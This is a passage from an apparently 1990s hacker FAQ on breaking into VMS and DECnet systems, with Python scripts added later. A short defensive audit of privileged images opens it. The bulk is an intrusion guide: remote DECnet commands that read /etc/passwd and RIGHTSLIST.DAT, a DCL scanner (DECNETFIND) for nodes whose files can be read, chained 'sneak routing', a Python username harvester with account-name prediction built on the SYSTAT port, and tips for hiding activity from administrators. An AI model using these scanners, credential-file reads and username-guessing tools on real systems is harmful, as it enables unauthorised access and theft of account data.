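\tEntry access count         = 9
\tPrivileges = WORLD SYSPRV
   MAIL;1                         Open Hdr Shar
\tEntry access count         = 4
   MYTRAP;2                       Prv
\tEntry access count         = 0
\tPrivileges = BYPASS
"""

DIR_RE = re.compile(r"^(\S.*\.EXE)\s*$")                          # device:<dir>.EXE
IMG_RE = re.compile(r"^ {3}(\S[^;\s]*)(?:;(\d+))?\s*(.*?)\s*$")   # "   NAME;ver flags"
PRIV_RE = re.compile(r"^\s+Privileges\s*=\s*(.*?)\s*$")


def parse_install_list(text):
    """Return one dict per installed image, in listing order."""
    images, directory, current = [], None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = DIR_RE.match(line)
        if m:                                   # new directory block
            directory, current = m.group(1), None
            continue
        m = IMG_RE.match(line)
        if m:                                   # image line: exactly 3 spaces of indent
            current = {"directory": directory, "image": m.group(1).upper(),
                       "version": m.group(2), "flags": m.group(3).split(),
                       "privileges": set()}
            images.append(current)
            continue
        m = PRIV_RE.match(line)
        if m and current is not None:           # attribute line belonging to current image
            current["privileges"] |= set(m.group(1).upper().split())
    return images


def audit(images, baseline):
    """Flag privileged images missing from the baseline or drifted from it."""
    findings = []
    for img in images:
        privs = img["privileges"]
        expected = baseline.get(img["image"])
        if expected is None:
            if not privs:                       # installed without privileges: not in scope
                continue
            reason, added, removed = "not in baseline", privs, set()
        else:
            added, removed = privs - expected, expected - privs
            if not added and not removed:
                continue
            reason = "privileges differ from baseline"
        findings.append({"image": img["image"], "directory": img["directory"],
                         "privileges": sorted(privs), "reason": reason,
                         "added": added, "removed": removed,
                         "critical": sorted(privs & CRITICAL)})
    return findings


def report(findings):
    """One human-readable line per finding."""
    return [f"{f['image']} in {f['directory']}: {f['reason']} "
            f"(privileges: {' '.join(f['privileges']) or '-'}; "
            f"critical: {' '.join(f['critical']) or '-'}; "
            f"+{' '.join(sorted(f['added'])) or '-'} -{' '.join(sorted(f['removed'])) or '-'})"
            for f in findings]


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LISTING
    for line in report(audit(parse_install_list(text), BASELINE)):
        print(line)
```

	Against the sample this reports SHOW (SYSPRV added beyond the baseline)
	and MYTRAP (privileged,  not in the baseline at all);  MAIL is installed
	but carries no privileges and is left alone.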

	     -     Using DEC's Network to your advantage     -

1.      "What is a DECNet?"

"DECnet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.

"A DECnet network links computers into flexible configurations to exchange
information,  share resources,  and perform distributed processing.  DECnet
distributed processing capabilities also allow information to be originated
anywhere in the network."

		- VMS Version 5.0 DECnet "Guide to DECnet - VAX Networking"

	DECnet can support from 2 nodes up to roughly 64,000 nodes,
	and can support multiple operating systems (VMS,  Ultrix,  RSX,
	and with the correct hardware,  IBM PCs,  VAXmates,  etc.) along
	with various LAN/WAN environments (using PSI,  a DECnet system
	can be supported over packet switching networks like Tymnet
	and Sprintnet).

	DECnet allows easy access to information from system to system,
	assuming you have the NETMBX privilege.

	To get a list of DECnet objects,  "$ MCR NCP SHOW KNOWN OBJECTS".

2.      "This is great,  what does it mean to me."

	You can use DECnet to grab information/files/programs and use
	them to your own advantage (granted that security has not
	been completely implemented... which is usually the case
	on a vanilla/default install).

	For instance,  if an intruder were to break into a system
	which is part of a DECnet,  he/she might be able to access files on
	remote systems/nodes of that DECnet.  As stated,  a DECnet
	can range from local machines in the area (LAN) to a network
	that stretches across the world.

3.      "How would I get to that information on a remote node?"

	All from DCL.  Your command is served on the remote node by its
	default (unprivileged) DECnet account,  or possibly by a
	privileged proxy account,  using commands like "DIRECTORY",
	"COPY",  "TYPE",  etc.,  usually by adding the node name at the
	beginning of the file specification.  For example

$ DIR NODE::            ! Example format.

	or 

$ DIR NODE::SYS$COMMON:[SYSEXE]  ! Shows logical SYS$COMMON and the SYSEXE
				 ! Directory on the remote node. 

	or

$ COPY NODE::DISK1:[BOB]SECRET.TXT []  ! The "[]" means "wherever i am"

	Remember DECnet object logs are being kept!  (On a VMS node the
	default DECnet account writes a NETSERVER.LOG for each connection
	into its login directory.)

4.      "What if I want to connect and use the nodes interactively?". 

	One of two ways.  Either way requires NETMBX privilege. Try to
	"SET HOST [NODENAME]".  If that fails, 
	try to use NCP (Network Control Program),  like this.....

$ MCR NCP CONNECT NODE [NODENAME]

5.      "Well,  Gee,  that's wonderful.  How do I find connectable nodes
	that are on the DECnet?"

	Once again,  this information can be found using NCP (or via
	the "SHOW NETWORK" command).  "SHOW NETWORK" won't work
	if you are on a non-routing (end) node.  You might not get a
	*complete* listing,  because the host you are on might not
	know all the DECnet nodes,  but it will at least get you hopping
	around on the DECnet.  The list can be obtained by executing.....

$ MCR NCP SHOW KNOWN NODES      ! volatile database; the permanent one is
				! SYS$SYSTEM:NETNODE_LOCAL.DAT and
				! SYS$SYSTEM:NETNODE_REMOTE.DAT (LIST KNOWN NODES)

	This will dump a list.  You can sort through the information
	using the NCP connect command,  and see what all sorts
	of things you run into (Xyplex/DECservers,  other VMS machines,
	SNA Gateway controls,  etc.,  etc.).  If you are only interested
	in machines that you can get file information from,  you can
	use the following command file to find nodes that you can
	use.

$! DECNETFIND  Version 1.0
$! Coded By The Beaver
$! Jan 5th,  1995
$!
$! The intent of this code is to scan for remote,  connectable nodes that
$! the VMS host knows about (Via NCP) and build a list.  Once this list
$! has been created,  we check to see if the remote machine is indeed
$! 1> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECnet 3> Can we read file systems on the remote node.
$! Nodes that are "successful" are stored away.  This prevents mucho
$! time consuming scanning by hand.
$!
$!
$ on error then goto err                        ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. ""                                ! Yes, output file helps
$       then
$       say "DECNet VMS Node Finder Version 1.0                   1995"
$       say "Coded By The Beaver"
$       say ""
$       say "Usage:"
$       say "DECNETFIND [Outfile]"
$       exit
$       endif
$!
$ say "Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out  ! Fire up NCP and dump the node list
$ open/read in nodes.out                 ! Open to read
$ open/write nodelist 'p1'               ! "Success" Storage area.
$ on severe_error then goto loop1        ! So things don't die on "dir ::"'s
$!
$ loop1:
$ read/end=end in line
$       name = f$element(0,")", f$element(1, "(", line)) ! grab a nodename
$       if name .nes. "("    ! f$element returns the delimiter if no "(name)" on the line
$         then
$         say "**************************************************************"
$         say "Nodename: "+name
$         say ""
$         dir 'name'::          ! See if we can get to it via a DECnet DIR::
$         if $severity .nes. "1"
$               then
$               say "Status:  Node Unreachable Via DECNet Dir::"
$               else
$               say "Status:  Found Good Node. [Logged]"
$               write nodelist name             ! Log it.
$               endif
$ endif
$ goto loop1
$ err:
$ say "Ouch.  There has been an error!"
$ end:
$ close in
$ close nodelist                ! Close up and leave,  exit stage
$ delete nodes.out;*            ! right
$ say "Complete!"
$ exit

	"That works great,  but I ran into a Unix (Ultrix) machine,  and
	when I do a 'DIR NODENAME::' it only gives me one user's home
	directory (the default DECnet account's).   Is there any way I can
	grab files off the remote machine (Ultrix) and get directory
	listings?"

	Once again,  no problem.   Format the command like this:

$ DIR NODE::"/etc"      ! will give remote nodes /etc directory

	Or to grab the /etc/passwd file on the remote node,  try....

$ TYPE NODE::"/etc/passwd"   ! And open a capture buffer. 

	"Can I grab a VMS rights list?"

$ COPY NODE::"SYS$SYSTEM:RIGHTSLIST.DAT" RIGHTSLIST.DAT

6.  "Can't DECnet be protected more against this generic attack?"

	Sure,  by disabling the default DECnet account and by watching any
	proxy accounts that may be set up (it is probably not a good idea to
	have a proxy into a privileged account).  Once the default account
	is gone,  unless a proxy is set up (SYS$SYSTEM:NETPROXY.DAT),  users
	must supply a username and password in an access control string
	(NODE"user password"::) when attempting network operations like the
	ones above.  Proxy logins are formatted below:

	(This example is using the DCL COPY command)

	COPY remotenode"proxyaccount"::filename filename

	for example,

	COPY ADAM"BOB"::SECURITY.TXT MYSECURITY.TXT

	(BOB - The Proxy login name)

	However,  in a vanilla VMS (IE - Default installation),
	proxy logins are not enabled.

7.      "Are proxy logins logged?  Can I write a routine that will
	attempt proxy accounts to break into remote machines?"

	You bet that proxy logins are logged.   Repeated invalid
	attempts will inform the administrators that a "NETWORK
	BREAK IN" is in progress (via the OPCOM process).

8.      Sneak Routing

	You can access a machine you normally couldn't by piggybacking
	over a machine you can get to (which in turn can get to the machine
	you can't),  through its DECnet account.  This is called "Poor Man's
	Routing",  and the node names are simply chained:

$ DIR HOP::TARGET::     ! HOP's DECnet account does the DIR on TARGET for you

	It is preventable by the sys admin on the piggyback machine.

		-       TCP/IP Networked Machines        - 

1.  "I have found a remote VMS machine on a TCP/IP network (I.E.
     the internet).   I have tried to finger the remote system in
     order to start collecting usernames,   I get a 'connection
     refused'.... Now what?"

	Connect to the SYSTAT port (port 11).  This will give the jobs
	(processes) currently running on the system.  More than likely,
	this port has been left open.  With this in mind,  you can
	sort through all the jobs and grab usernames,  while excluding
	system jobs (I.E - SWAPPER,  ERRFMT,  AUDIT_SERVER,
	JOB_CONTROL,  NETACP,  EVL,  REMACP,  SYMBIONT*,
	XYP_SERVER,   OPCOM,  INET_SERVERS,  etc....etc).

	Also,  I find one great trick is to look for "student" type
	accounts.  That is,  accounts whose names appear to be repetitive
	(a common prefix followed by a number).  You can then predict
	possible usernames.

	The above can be accomplished by using the below command
	(in most cases):

$ TELNET SITE.ADDRESS.COM /PORT=11

	Try other ports as well.  Netstat is port 15.
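
	The username harvest described above,  as an added example that is
	not part of the FAQ:  a Python script that parses a saved copy of what
	port 11 returns,  drops the system processes listed above (SYMBIONT*
	as a prefix),  folds subprocesses such as JOEBOB_1 into their parent,
	and then applies the "student account" trick,  predicting the unseen
	names where several observed names share a prefix and differ only in a
	number.  The SYSTAT text is constructed for the example in the shape of
	a VAX/VMS SHOW SYSTEM listing;  real column widths vary by version and
	TCP/IP stack,  so the parser keys on the 8-hex-digit PID column rather
	than fixed offsets.

```python
"""Harvest usernames from a SYSTAT (TCP port 11) dump and predict more.

Added example, not from the FAQ.  Save the banner with something like
    $ TELNET SITE.ADDRESS.COM /PORT=11
(or nc host 11 > systat.txt) and run this over the saved text.  The sample
below is constructed to resemble a VAX/VMS SHOW SYSTEM listing.
"""
import re
from collections import defaultdict

# System processes the FAQ says to skip; SYMBIONT* is a prefix match.
# Extend both for your own site.
SYSTEM_PROCS = {"SWAPPER", "ERRFMT", "AUDIT_SERVER", "JOB_CONTROL", "NETACP",
                "EVL", "REMACP", "XYP_SERVER", "OPCOM", "INET_SERVERS"}
SYSTEM_PREFIXES = ("SYMBIONT",)

SAMPLE_SYSTAT = """\
VAX/VMS V5.2  on node UPPERDCK   6-JAN-1995 07:42:27.01   Uptime  3 02:17:43
  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
00000021 SWAPPER         HIB     16        0   0 00:00:12.45         0      0
00000025 ERRFMT          HIB      8     2346   0 00:00:03.12        87    120
00000026 OPCOM           LEF      8     1211   0 00:00:02.70       219    155
00000027 AUDIT_SERVER    HIB     10      803   0 00:00:01.13       280    201
00000028 JOB_CONTROL     HIB     10     4467   0 00:00:06.30        86    162
00000029 NETACP          HIB     10     9921   0 00:00:15.19       145    332
0000002A EVL             HIB      6       91   0 00:00:00.35      2005     41
0000002B REMACP          HIB      9       17   0 00:00:00.02        71     39
0000002C SYMBIONT_0001   HIB      6      155   0 00:00:00.41       349    108
00000101 SYSTEM          LEF      4      920   0 00:00:04.11      1840    610
0000010F JOEBOB          LEF      4      112   0 00:00:01.01       512    301
00000110 JOEBOB_1        LEF      4       30   0 00:00:00.20       411    219
00000113 CS101_03        CUR      4       75   0 00:00:00.90       602    270
00000114 CS101_07        LEF      4       61   0 00:00:00.72       588    233
00000115 CS101_12        LEF      4       98   0 00:00:01.05       640    280
"""

# PID (8 hex digits), process name, scheduling state, base priority.
PID_LINE = re.compile(r"^([0-9A-Fa-f]{8})\s+(\S+)\s+([A-Z]{2,5})\s+\d+")
SUBPROC = re.compile(r"^(.+)_\d+$")                           # JOEBOB_1 -> JOEBOB
NUMBERED = re.compile(r"^([A-Z][A-Z0-9_]*?[A-Z_])(\d+)$")     # CS101_03 -> CS101_, 03


def parse_systat(text):
    """Process names in listing order; banner and header lines are skipped."""
    return [m.group(2).upper() for m in map(PID_LINE.match, text.splitlines()) if m]


def is_system_process(name):
    # Names beginning with "_" are terminal-named processes, not usernames.
    return (name in SYSTEM_PROCS or name.startswith(SYSTEM_PREFIXES)
            or name.startswith("_"))


def harvest_usernames(text):
    """Candidate usernames: non-system process names, subprocesses folded into parents."""
    names = parse_systat(text)
    present = set(names)
    users = []
    for name in names:
        if is_system_process(name):
            continue
        m = SUBPROC.match(name)
        if m and m.group(1) in present:       # treat as subprocess only if the parent is listed
            name = m.group(1)
        if name not in users:
            users.append(name)
    return users


def predict_usernames(users):
    """For prefixes seen with two or more numbers, list the unseen names in the range."""
    groups = defaultdict(list)
    for user in users:
        m = NUMBERED.match(user)
        if m:
            groups[m.group(1)].append(m.group(2))
    predicted = {}
    for prefix, nums in groups.items():
        if len(nums) < 2:
            continue
        width = max(len(n) for n in nums)      # keep the zero padding that was observed
        seen = {int(n) for n in nums}
        predicted[prefix] = [f"{prefix}{i:0{width}d}"
                             for i in range(min(seen), max(seen) + 1) if i not in seen]
    return predicted


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SYSTAT
    found = harvest_usernames(text)
    print("observed:", " ".join(found))
    for prefix, guesses in predict_usernames(found).items():
        print(f"pattern {prefix}NN: try {' '.join(guesses)}")
```

	On the sample this yields SYSTEM,  JOEBOB and the three CS101_ accounts,
	and predicts CS101_04 through CS101_11 (minus the ones already seen) as
	names worth trying.  Remember that the same listing is available to the
	administrator,  who will also see your process name in it.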

2.      "On Unix machines,  I can make a symbolic link to a 'questionable'
	command,   so that it appears that I am doing one thing when
	I am really doing another (or copying and renaming the command).
	Is there any way I can make it appear that I am doing something
	that I am not?".

	When the command "FINGER" is issued,  a user/administrator
	can see what image is currently being executed by a particular
	user.   For example's sake,  let's say you want to play with
	NCP but you know that if the administrators see you in NCP,
	they will get rather irate,  and kick you off the system.
	You can make it appear that you are doing something else
	by:

	a>  Copying the image,  renaming it,  and running it. [which
	    may or may not work].

3.      TCPDUMP

	Multinet(and probably other TCP/IP implementations on VMS) provides
	the sniffer program TCPDUMP, but of course you must be privileged
	to use it.

Final Notes: 

	This FAQ is far from complete,  and will remain in its "beta"
	stages for sometime.  

	I got a lot of mail from a lot of people.

	Thanks to Shadow Hacker,   Risc,   Trouser,  Spoon,  and 
	all the boys at The Upper-Deck. 

	Bitwarrier for interesting conversation (besides terminal
	spoofing),  the ton of people that mailed me.  Thanks.

	- Things that need to be added/updates:

	  Identifying VMS machines.....
	  Information on the OPCOM process....

	- What we are looking for:

	  Ways of intercepting VMS communications(through mailboxes, etc.)

	  Passing commands via VMS mail.

	  Disk scavenging programs(along the lines of an "UNDELETE")

	  Xterm,Motif security

	  Various methods of machine spoofing(via TCP/IP,LAT,etc.)

	  File hacks with 'dump', 'patch', VFE, etc.

	  Anything else we might have missed.

	beaver@upperdck.blkbox.com

	"It ain't done,  but hey... It a fucking start......"